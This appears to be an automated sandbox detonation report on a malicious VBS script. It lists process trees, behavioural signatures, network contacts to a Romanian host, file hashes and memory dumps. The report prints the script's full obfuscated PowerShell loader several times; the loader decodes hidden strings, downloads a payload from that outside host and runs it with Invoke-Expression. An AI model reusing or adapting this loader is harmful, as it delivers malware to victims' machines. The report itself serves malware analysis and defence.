MyosiElsinlA.tage Ef e(Presc$Hu.riEfejlbxContrt ShyleHe errO letn RealaPosselSilkei Ne,fsRekvimMidwe,Seko,$SteepS Vi,lpEndopiRek,lr Re,siBe,tytR arhuDyrskaRetablNo maiMasc.sNondymAdv neThore)tinge ';$Spiritualisme=$Squam[0];schlepper (Steatolytic 'kursu$Resulg F.gelUnsphoDigitbUnchraArbejlSpad,:Le.onbVildsr Emunn Capie Truss Benzi amshkAadkorMarkeivarslnUndergAcupue Aut,rUbnhrsGutli=w ndf(Allo,T KonteBuk esLgesttFinge-skidtP.udgeaTeksttTermihMal r Lydse$ReparSA,onnpVidneiRegisrUnd,liPadout Na buMultia turdl OveriCar isStenkm.ordyeIntri)Serbo ');while (!$brnesikringers) {schlepper (Steatolytic 'hospi$Dr.kngMedlilVicksoPladsbkv tuaPakkelReass: atwaVTrut.aAntigrgangee AnaldScop e Forek Rekll insuaArticrBrefre Rubbrfng,eeCobbltForma=Delin$Undert Mis,r Fedtu Lokae Udfo ') ;schlepper $Pedicellated159;schlepper (Steatolytic 'In drSRek at Ved.a .ndlr OdietNewsb-C,labSUdsanlJagtgeChurle.natopChrys onyun4Ungar ');schlepper (Steatolytic 'Hu,dr$Trio.g HeadlUniveoBu heb S.lea Hovelaustr: A,phbCeratrtheolnAtla e OutbsSawb iCampakTark,rSemiciEncrynPokingHybrieLindrrEndots vrms=Nulst( BeskT VolueReg,esPaa,gt Bemo-AneroP FyrsaPhan.tg idehGevan Overs$KnudeSK mmepatmosiTaraxrSewariForsktakvaruSettoaIlluslBes,riSwiwesForammNe,coe Eve.)Ti ba ') ;schlepper (Steatolytic 'Cry,t$Vehefg S mil viceoSplitbGentlaContol.ikle:Lea hSBoligaMletstUnbela rivanHavebi Lu.usGr ene Wa s4Frisk6End c=Li do$,orttgMve,rl Spe oSydhabopdaga.denolbelgn:trundAA.tiedGe.neoLegetpPosnitAntiaa In.enPeroxtSotree M larPro,usPreva+missi+ B tt%Ku an$PeculCGena,uKlni,rSu,cea,utiltUnraniUdhvncVse t2Ge,ni3Una n2Progr.S inncUltraoTikrou Aemin Unfit Pore ') ;$Externalism=$Curatic232[$Satanise46];}$Fangerne115=311650;$Uomtvisteligheds=29747;schlepper (Steatolytic 'R mot$overrgFril.lAccumoSubchbForbiaRebe l Conc:brakvL Mis aRewets S.bct Sheve.mblyeElephv R ssnP ojee resasU eal Forda= Si k PeploG Roste CytotYarne-Th.spCErhveoSte.gnB.vaatMajbreKorrin Box,t Mis, H per$ServiS vandp Bas.iLuddir BlaniHnsehtFr lauOver,aH,urel.mpaliVanrysbran mCardieK ntr ');schlepper (Steatolytic 'P ran$Zy,otgScabblBeaucovaterbBundpaDi talKva,r:SarcoB JubheSlgtss,lumevLiviaiLobatmSkylde StaglSpasmsAculeeD fenrAppernMat.reFourqsTeuto lsr,v=Rasal Epita[ KrseSblirry ilssFe.lhtStetie G usmKirtl. epi.CRespioRdkaanTiaarvSansee bdigrwoo.htPens,]Prefa:U.raa:O onnFEfte rCostmoOeretmBes.fBAugusaChlorsBal,ieDioti6Paask4Ch.ssSM,cketOlympr s opiHjlp nForurg Acco( Pol.$Sj,skL Gruna MgfasFlgett BraneHovedeSekt v illenUnelaeeuropsTypon)s.ept ');schlepper (Steatolytic 'Ln um$ thyrgFontnl.lfbjoFran bTerr.aSportlNumer:Unde,B .verrDefacuSprinnForels No,atE.uats Enke Vaing=udsky Chlam[QuiddSInterySkolisD.velt ,ksee .yncmKleri.,abulT Svider,visxPuncttKlods.NemerED mstnReunicArbejoQuizddBoeo.i Peain Jyllgunque]Mitvo: Cook:SikkeA L,diSAnlbeCHudd IKatniIAlim .Sk,abG craceEnfratAl.unSReb.lt muz.r Hapli NonsnQuippgOutwi(Al.oi$.pfinBFortreFrag sV,rguvMonetiZap emCon teHovm l wordsFejlve ersrLasednDrmmeeSmrkesHisp,)Pat.i ');schlepper (Steatolytic ' Danc$ Crusg.ragelXylofo Te,rbsch,haPeritlAnari:Rad.oAFladerS.ytsbKi oreIncomjD,pind FitzsVa,mef EfteeJord.lConv tFremtePa,sarElber=ned.a$ StifBUdbygrPlaceuSunsmnphlo sC erctUdvlgsOrbit.pebblsUd kuuMlejebTem,usStockt AmilrHnsegiGall,nStan,gRefug(Jinji$Pais,FEightaMisfon.ummegC,rtie UnsorPendlnKer he e ra1L nge1Aflaa5Siksa, D,ti$ScorcUEleuto .nspmBrygmtRi,sfvU imeiMyldrsBechatdi areStililSkr.aiMe.afg .uenhAfpreeThreadUnjags Plan)Efter ');schlepper $Arbejdsfelter;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magtkampens.Bib && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 www.energy-serv.ro udp
RO 109.205.90.147:80 www.energy-serv.ro tcp

Files

memory/2840-4-0x0000000002440000-0x00000000024C0000-memory.dmp

memory/2840-5-0x000000001B190000-0x000000001B472000-memory.dmp

memory/2840-6-0x00000000026F0000-0x00000000026F8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B1OV4B2N0I250XZM9KHX.temp

MD5 182295c18c3a9995f3b25fc6d9d78447
SHA1 65fe1c23b4e00e0af664588fba5ad803bb93bb9b
SHA256 0587b01d956db7779222463685fc55b6a0be90d26fdbc218df826546f366ef9c
SHA512 9e44e2178e9075ba4f74a270350e56e05f65c3128949c2496070015c68bfdb207be9fda381b5f6fc140dbfc844797f1974595edee0215a20b1b1692a528d4cb0

memory/2840-11-0x0000000002440000-0x00000000024C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Magtkampens.Bib

MD5 8dd5eb68685e339e1651cbeefd0b235f
SHA1 cef3800a21bf4b8142333629fe685d1107c1ffa5
SHA256 5cf4b171cfc0ad5166bc8be93b41bcebe53aa1c1194a054271201dcbe48c84d1
SHA512 83d40812894f1fc3d03aca47686776fc6361a1fa52fe2f11ef22c2952c6b65d7422c34b47cbd61d37e77a3048358de2ee3ffc3ab67990d15abf3ca71c8d55b97

memory/2804-13-0x00000000062A0000-0x000000000872B000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

125s

Max time network

154s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1984 wrote to memory of 4928 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 1984 wrote to memory of 4928 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 1984 wrote to memory of 3356 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 1984 wrote to memory of 3356 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 1984 wrote to memory of 2828 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 1984 wrote to memory of 2828 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 1984 wrote to memory of 2540 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1984 wrote to memory of 2540 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1984 wrote to memory of 1400 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1400 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1400 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1400 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1400 wrote to memory of 716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1400 wrote to memory of 716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1400 wrote to memory of 716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 716 wrote to memory of 4688 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 716 wrote to memory of 4688 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 716 wrote to memory of 4688 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs"

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping %.%.%.%

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$graanes = 1;Function Steatolytic($Feltsengenes){$Procereal=$Feltsengenes.Length-$graanes;$Bagger='Substring';For( $Enligtstilledes=5;$Enligtstilledes -lt $Procereal;$Enligtstilledes+=6){$Uncleanlily164+=$Feltsengenes.$Bagger.Invoke( $Enligtstilledes, $graanes);}$Uncleanlily164;}function schlepper($Lamond){ . ($Vittighed) ($Lamond);}$Xenofobi=Steatolytic 'E terMUnabsoFeatuzHeteriBilinl EnkrlNeumaaPigtr/Disco5M.xop. Taxo0 .dtm Viss (Vi cuWSlu,niLineanSem.edColo,oToptywAn.ets Cham SoreoNRangeTKambr octag1 Abol0Slaae.Tughr0Dispa;wiene gypp,W TeapiSlavenGramm6 T si4Dyarc;Ab,li Strogx Boo 6Pricy4S aln;Teach Fo osromkvdv roo:C,ino1 Non.2horke1Spytk.Acc,d0Deoxi)Natur TredvGShelleLibr c rustkMarmooMonod/Indkb2Assem0Cytod1,rykk0Digit0 Fors1Ma,le0Exten1Count uftkFPer.giFejlsrNedtre.rrelfteughoGel,txPangs/.ekru1An dy2Ragou1 rape.Arres0 Se,s ';$Dingdong=Steatolytic 'QuizmUCirk sIronsedruknrunipe-Uni.pAInyokgTritiePock,ntartatAplit ';$Externalism=Steatolytic 'MorgahRe iot.ssemtRecurpFortr:acrop/ Bl,d/RotorwDetaiw.opulw Jagt.YngleeLivsvnHe.ereSquirrUnderg SubtyPrecr-OpdrtsCra ne abesrAnativSnuse.An iarEgal.oMamba/ClaviGSpotseante,nDi etf s ksoPurprrAntite Re lnChe.kiKastsnAutorg laresU,enl.Bivu,d TainwPaa.rpMidtv ';$Underbeak=Steatolytic 'aw le>Veder ';$Vittighed=Steatolytic 'overaiDistre,omanxSc,th ';$Bibeholdelsernes='Skolelreren';$Klediskenes = Steatolytic '.etapeGartncrhinsh HjdeoFaris Mult%,orbiaKababpSpottpSpathdconchaScofft Mu iaP eud%fort.\ StilMSrsk a BlgegFuelstPerisknut,aa CrypmNonstpPeasaeAmerinOvoges Fi.m. AlleBH,rseiThi,tbMids. Besv & Kede&Mohik StabeeUnnumc IrrehApopho Regl BikortUpway ';schlepper (Steatolytic 'Gifte$MylohgLoghelPolteovizorbSki maOpercl Bams:Fet.cSTyperq AbseuConnea Homim Avan=H ndy(DupskcInd.mmR dredInte perig/ R cicBr.ss Se.ge$DiffeKFagl.lFrosteTopf dUnreai R susUnderk HuggeRejecn repreUnc rs,rgan) Empo ');schlepper (Steatolytic 'Rdgr,$Ab,trgMgbunl KomtoFiskebgravlaCarmel Indl: GlosCUrsoluSiouxrMestraStilttM scei lottcBouga2 Topn3Dia,o2 Bram=Ecdys$sv.psEMyr,ex BeritPre,geAnsigrCa lenI,peta.orrelAndetiHenvesPytonmMono..EnshasAntagp spedlUdtydiOverptStu p(Elapi$HeterUUnrewnHferhd .kskePipi.rBedlab SetieProkua NonlkFejlb)Demur ');$Externalism=$Curatic232[0];$Coenenchym= (Steatolytic 'Fiske$Pol,cgskadelEloigo Fiskb P,liaIs,aml Vrdi:DiskeTNedslhSca ieBoehmr,lowheFattib.otizyale t=SuperNBiklaeTreatwTropi-VidenONontebenth jGennee GenncbefoltEta.r EfterSGavlhyVandks GunltL.xineLik,imAndel.InopeNKotoweS.ppotPosta.So,teW IsoceGrandbSupp,CFor al,lassi .miteundernBor.rt');$Coenenchym+=$Squam[1];schlepper ($Coenenchym);schlepper (Steatolytic ' ondo$InvenTVehefh udeneTur.erPsycheWithobOstomyMa,tr.scariH PhyteUnbeaaPatted KofieHydrorPsychsprota[Briar$AlloxDImpl i TrionLysn,gobligdDarnso Tou nAvifagAntic]Damga= etag$SekteXErbiue TabunIllibouroenfH,poto BrdebBl,nniRaci, ');$Pedicellated159=Steatolytic 'Skrmf$ andTPreaghSkurke Fal.r nemoeStipubArbejy Unav. PsycDsemisoProblwJertfnS ddel Stifo Udsia,eridd armhF MyosiElsinlA.tage Ef e(Presc$Hu.riEfejlbxContrt ShyleHe errO letn RealaPosselSilkei Ne,fsRekvimMidwe,Seko,$SteepS Vi,lpEndopiRek,lr Re,siBe,tytR arhuDyrskaRetablNo maiMasc.sNondymAdv neThore)tinge ';$Spiritualisme=$Squam[0];schlepper (Steatolytic 'kursu$Resulg F.gelUnsphoDigitbUnchraArbejlSpad,:Le.onbVildsr Emunn Capie Truss Benzi amshkAadkorMarkeivarslnUndergAcupue Aut,rUbnhrsGutli=w ndf(Allo,T KonteBuk esLgesttFinge-skidtP.udgeaTeksttTermihMal r Lydse$ReparSA,onnpVidneiRegisrUnd,liPadout Na buMultia turdl OveriCar isStenkm.ordyeIntri)Serbo ');while (!$brnesikringers) {schlepper (Steatolytic 'hospi$Dr.kngMedlilVicksoPladsbkv tuaPakkelReass: atwaVTrut.aAntigrgangee AnaldScop e Forek Rekll insuaArticrBrefre Rubbrfng,eeCobbltForma=Delin$Undert Mis,r Fedtu Lokae Udfo ') ;schlepper $Pedicellated159;schlepper (Steatolytic 'In drSRek at Ved.a .ndlr OdietNewsb-C,labSUdsanlJagtgeChurle.natopChrys onyun4Ungar ');schlepper (Steatolytic 'Hu,dr$Trio.g HeadlUniveoBu heb S.lea Hovelaustr: A,phbCeratrtheolnAtla e OutbsSawb iCampakTark,rSemiciEncrynPokingHybrieLindrrEndots vrms=Nulst( BeskT VolueReg,esPaa,gt Bemo-AneroP FyrsaPhan.tg idehGevan Overs$KnudeSK mmepatmosiTaraxrSewariForsktakvaruSettoaIlluslBes,riSwiwesForammNe,coe Eve.)Ti ba ') ;schlepper (Steatolytic 'Cry,t$Vehefg S mil viceoSplitbGentlaContol.ikle:Lea hSBoligaMletstUnbela rivanHavebi Lu.usGr ene Wa s4Frisk6End c=Li do$,orttgMve,rl Spe oSydhabopdaga.denolbelgn:trundAA.tiedGe.neoLegetpPosnitAntiaa In.enPeroxtSotree M larPro,usPreva+missi+ B tt%Ku an$PeculCGena,uKlni,rSu,cea,utiltUnraniUdhvncVse t2Ge,ni3Una n2Progr.S inncUltraoTikrou Aemin Unfit Pore ') ;$Externalism=$Curatic232[$Satanise46];}$Fangerne115=311650;$Uomtvisteligheds=29747;schlepper (Steatolytic 'R mot$overrgFril.lAccumoSubchbForbiaRebe l Conc:brakvL Mis aRewets S.bct Sheve.mblyeElephv R ssnP ojee resasU eal Forda= Si k PeploG Roste CytotYarne-Th.spCErhveoSte.gnB.vaatMajbreKorrin Box,t Mis, H per$ServiS vandp Bas.iLuddir BlaniHnsehtFr lauOver,aH,urel.mpaliVanrysbran mCardieK ntr ');schlepper (Steatolytic 'P ran$Zy,otgScabblBeaucovaterbBundpaDi talKva,r:SarcoB JubheSlgtss,lumevLiviaiLobatmSkylde StaglSpasmsAculeeD fenrAppernMat.reFourqsTeuto lsr,v=Rasal Epita[ KrseSblirry ilssFe.lhtStetie G usmKirtl. epi.CRespioRdkaanTiaarvSansee bdigrwoo.htPens,]Prefa:U.raa:O onnFEfte rCostmoOeretmBes.fBAugusaChlorsBal,ieDioti6Paask4Ch.ssSM,cketOlympr s opiHjlp nForurg Acco( Pol.$Sj,skL Gruna MgfasFlgett BraneHovedeSekt v illenUnelaeeuropsTypon)s.ept ');schlepper (Steatolytic 'Ln um$ thyrgFontnl.lfbjoFran bTerr.aSportlNumer:Unde,B .verrDefacuSprinnForels No,atE.uats Enke Vaing=udsky Chlam[QuiddSInterySkolisD.velt ,ksee .yncmKleri.,abulT Svider,visxPuncttKlods.NemerED mstnReunicArbejoQuizddBoeo.i Peain Jyllgunque]Mitvo: Cook:SikkeA L,diSAnlbeCHudd IKatniIAlim .Sk,abG craceEnfratAl.unSReb.lt muz.r Hapli NonsnQuippgOutwi(Al.oi$.pfinBFortreFrag sV,rguvMonetiZap emCon teHovm l wordsFejlve ersrLasednDrmmeeSmrkesHisp,)Pat.i ');schlepper (Steatolytic ' Danc$ Crusg.ragelXylofo Te,rbsch,haPeritlAnari:Rad.oAFladerS.ytsbKi oreIncomjD,pind FitzsVa,mef EfteeJord.lConv tFremtePa,sarElber=ned.a$ StifBUdbygrPlaceuSunsmnphlo sC erctUdvlgsOrbit.pebblsUd kuuMlejebTem,usStockt AmilrHnsegiGall,nStan,gRefug(Jinji$Pais,FEightaMisfon.ummegC,rtie UnsorPendlnKer he e ra1L nge1Aflaa5Siksa, D,ti$ScorcUEleuto .nspmBrygmtRi,sfvU imeiMyldrsBechatdi areStililSkr.aiMe.afg .uenhAfpreeThreadUnjags Plan)Efter ');schlepper $Arbejdsfelter;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magtkampens.Bib && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$graanes = 1;Function Steatolytic($Feltsengenes){$Procereal=$Feltsengenes.Length-$graanes;$Bagger='Substring';For( $Enligtstilledes=5;$Enligtstilledes -lt $Procereal;$Enligtstilledes+=6){$Uncleanlily164+=$Feltsengenes.$Bagger.Invoke( $Enligtstilledes, $graanes);}$Uncleanlily164;}function schlepper($Lamond){ . ($Vittighed) ($Lamond);}$Xenofobi=Steatolytic 'E terMUnabsoFeatuzHeteriBilinl EnkrlNeumaaPigtr/Disco5M.xop. Taxo0 .dtm Viss (Vi cuWSlu,niLineanSem.edColo,oToptywAn.ets Cham SoreoNRangeTKambr octag1 Abol0Slaae.Tughr0Dispa;wiene gypp,W TeapiSlavenGramm6 T si4Dyarc;Ab,li Strogx Boo 6Pricy4S aln;Teach Fo osromkvdv roo:C,ino1 Non.2horke1Spytk.Acc,d0Deoxi)Natur TredvGShelleLibr c rustkMarmooMonod/Indkb2Assem0Cytod1,rykk0Digit0 Fors1Ma,le0Exten1Count uftkFPer.giFejlsrNedtre.rrelfteughoGel,txPangs/.ekru1An dy2Ragou1 rape.Arres0 Se,s ';$Dingdong=Steatolytic 'QuizmUCirk sIronsedruknrunipe-Uni.pAInyokgTritiePock,ntartatAplit ';$Externalism=Steatolytic 'MorgahRe iot.ssemtRecurpFortr:acrop/ Bl,d/RotorwDetaiw.opulw Jagt.YngleeLivsvnHe.ereSquirrUnderg SubtyPrecr-OpdrtsCra ne abesrAnativSnuse.An iarEgal.oMamba/ClaviGSpotseante,nDi etf s ksoPurprrAntite Re lnChe.kiKastsnAutorg laresU,enl.Bivu,d TainwPaa.rpMidtv ';$Underbeak=Steatolytic 'aw le>Veder ';$Vittighed=Steatolytic 'overaiDistre,omanxSc,th ';$Bibeholdelsernes='Skolelreren';$Klediskenes = Steatolytic '.etapeGartncrhinsh HjdeoFaris Mult%,orbiaKababpSpottpSpathdconchaScofft Mu iaP eud%fort.\ StilMSrsk a BlgegFuelstPerisknut,aa CrypmNonstpPeasaeAmerinOvoges Fi.m. AlleBH,rseiThi,tbMids. Besv & Kede&Mohik StabeeUnnumc IrrehApopho Regl BikortUpway ';schlepper (Steatolytic 'Gifte$MylohgLoghelPolteovizorbSki maOpercl Bams:Fet.cSTyperq AbseuConnea Homim Avan=H ndy(DupskcInd.mmR dredInte perig/ R cicBr.ss Se.ge$DiffeKFagl.lFrosteTopf dUnreai R susUnderk HuggeRejecn repreUnc rs,rgan) Empo ');schlepper (Steatolytic 'Rdgr,$Ab,trgMgbunl KomtoFiskebgravlaCarmel Indl: GlosCUrsoluSiouxrMestraStilttM scei lottcBouga2 Topn3Dia,o2 Bram=Ecdys$sv.psEMyr,ex BeritPre,geAnsigrCa lenI,peta.orrelAndetiHenvesPytonmMono..EnshasAntagp spedlUdtydiOverptStu p(Elapi$HeterUUnrewnHferhd .kskePipi.rBedlab SetieProkua NonlkFejlb)Demur ');$Externalism=$Curatic232[0];$Coenenchym= (Steatolytic 'Fiske$Pol,cgskadelEloigo Fiskb P,liaIs,aml Vrdi:DiskeTNedslhSca ieBoehmr,lowheFattib.otizyale t=SuperNBiklaeTreatwTropi-VidenONontebenth jGennee GenncbefoltEta.r EfterSGavlhyVandks GunltL.xineLik,imAndel.InopeNKotoweS.ppotPosta.So,teW IsoceGrandbSupp,CFor al,lassi .miteundernBor.rt');$Coenenchym+=$Squam[1];schlepper ($Coenenchym);schlepper (Steatolytic ' ondo$InvenTVehefh udeneTur.erPsycheWithobOstomyMa,tr.scariH PhyteUnbeaaPatted KofieHydrorPsychsprota[Briar$AlloxDImpl i TrionLysn,gobligdDarnso Tou nAvifagAntic]Damga= etag$SekteXErbiue TabunIllibouroenfH,poto BrdebBl,nniRaci, ');$Pedicellated159=Steatolytic 'Skrmf$ andTPreaghSkurke Fal.r nemoeStipubArbejy Unav. PsycDsemisoProblwJertfnS ddel Stifo Udsia,eridd armhF MyosiElsinlA.tage Ef e(Presc$Hu.riEfejlbxContrt ShyleHe errO letn RealaPosselSilkei Ne,fsRekvimMidwe,Seko,$SteepS Vi,lpEndopiRek,lr Re,siBe,tytR arhuDyrskaRetablNo maiMasc.sNondymAdv neThore)tinge ';$Spiritualisme=$Squam[0];schlepper (Steatolytic 'kursu$Resulg F.gelUnsphoDigitbUnchraArbejlSpad,:Le.onbVildsr Emunn Capie Truss Benzi amshkAadkorMarkeivarslnUndergAcupue Aut,rUbnhrsGutli=w ndf(Allo,T KonteBuk esLgesttFinge-skidtP.udgeaTeksttTermihMal r Lydse$ReparSA,onnpVidneiRegisrUnd,liPadout Na buMultia turdl OveriCar isStenkm.ordyeIntri)Serbo ');while (!$brnesikringers) {schlepper (Steatolytic 'hospi$Dr.kngMedlilVicksoPladsbkv tuaPakkelReass: atwaVTrut.aAntigrgangee AnaldScop e Forek Rekll insuaArticrBrefre Rubbrfng,eeCobbltForma=Delin$Undert Mis,r Fedtu Lokae Udfo ') ;schlepper $Pedicellated159;schlepper (Steatolytic 'In drSRek at Ved.a .ndlr OdietNewsb-C,labSUdsanlJagtgeChurle.natopChrys onyun4Ungar ');schlepper (Steatolytic 'Hu,dr$Trio.g HeadlUniveoBu heb S.lea Hovelaustr: A,phbCeratrtheolnAtla e OutbsSawb iCampakTark,rSemiciEncrynPokingHybrieLindrrEndots vrms=Nulst( BeskT VolueReg,esPaa,gt Bemo-AneroP FyrsaPhan.tg idehGevan Overs$KnudeSK mmepatmosiTaraxrSewariForsktakvaruSettoaIlluslBes,riSwiwesForammNe,coe Eve.)Ti ba ') ;schlepper (Steatolytic 'Cry,t$Vehefg S mil viceoSplitbGentlaContol.ikle:Lea hSBoligaMletstUnbela rivanHavebi Lu.usGr ene Wa s4Frisk6End c=Li do$,orttgMve,rl Spe oSydhabopdaga.denolbelgn:trundAA.tiedGe.neoLegetpPosnitAntiaa In.enPeroxtSotree M larPro,usPreva+missi+ B tt%Ku an$PeculCGena,uKlni,rSu,cea,utiltUnraniUdhvncVse t2Ge,ni3Una n2Progr.S inncUltraoTikrou Aemin Unfit Pore ') ;$Externalism=$Curatic232[$Satanise46];}$Fangerne115=311650;$Uomtvisteligheds=29747;schlepper (Steatolytic 'R mot$overrgFril.lAccumoSubchbForbiaRebe l Conc:brakvL Mis aRewets S.bct Sheve.mblyeElephv R ssnP ojee resasU eal Forda= Si k PeploG Roste CytotYarne-Th.spCErhveoSte.gnB.vaatMajbreKorrin Box,t Mis, H per$ServiS vandp Bas.iLuddir BlaniHnsehtFr lauOver,aH,urel.mpaliVanrysbran mCardieK ntr ');schlepper (Steatolytic 'P ran$Zy,otgScabblBeaucovaterbBundpaDi talKva,r:SarcoB JubheSlgtss,lumevLiviaiLobatmSkylde StaglSpasmsAculeeD fenrAppernMat.reFourqsTeuto lsr,v=Rasal Epita[ KrseSblirry ilssFe.lhtStetie G usmKirtl. epi.CRespioRdkaanTiaarvSansee bdigrwoo.htPens,]Prefa:U.raa:O onnFEfte rCostmoOeretmBes.fBAugusaChlorsBal,ieDioti6Paask4Ch.ssSM,cketOlympr s opiHjlp nForurg Acco( Pol.$Sj,skL Gruna MgfasFlgett BraneHovedeSekt v illenUnelaeeuropsTypon)s.ept ');schlepper (Steatolytic 'Ln um$ thyrgFontnl.lfbjoFran bTerr.aSportlNumer:Unde,B .verrDefacuSprinnForels No,atE.uats Enke Vaing=udsky Chlam[QuiddSInterySkolisD.velt ,ksee .yncmKleri.,abulT Svider,visxPuncttKlods.NemerED mstnReunicArbejoQuizddBoeo.i Peain Jyllgunque]Mitvo: Cook:SikkeA L,diSAnlbeCHudd IKatniIAlim .Sk,abG craceEnfratAl.unSReb.lt muz.r Hapli NonsnQuippgOutwi(Al.oi$.pfinBFortreFrag sV,rguvMonetiZap emCon teHovm l wordsFejlve ersrLasednDrmmeeSmrkesHisp,)Pat.i ');schlepper (Steatolytic ' Danc$ Crusg.ragelXylofo Te,rbsch,haPeritlAnari:Rad.oAFladerS.ytsbKi oreIncomjD,pind FitzsVa,mef EfteeJord.lConv tFremtePa,sarElber=ned.a$ StifBUdbygrPlaceuSunsmnphlo sC erctUdvlgsOrbit.pebblsUd kuuMlejebTem,usStockt AmilrHnsegiGall,nStan,gRefug(Jinji$Pais,FEightaMisfon.ummegC,rtie UnsorPendlnKer he e ra1L nge1Aflaa5Siksa, D,ti$ScorcUEleuto .nspmBrygmtRi,sfvU imeiMyldrsBechatdi areStililSkr.aiMe.afg .uenhAfpreeThreadUnjags Plan)Efter ');schlepper $Arbejdsfelter;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magtkampens.Bib && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 68.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 www.energy-serv.ro udp
RO 109.205.90.147:80 www.energy-serv.ro tcp
US 8.8.8.8:53 147.90.205.109.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 41.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 73.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

memory/1400-0-0x00007FF989033000-0x00007FF989035000-memory.dmp

memory/1400-6-0x0000027974D30000-0x0000027974D52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4fggukgs.snw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
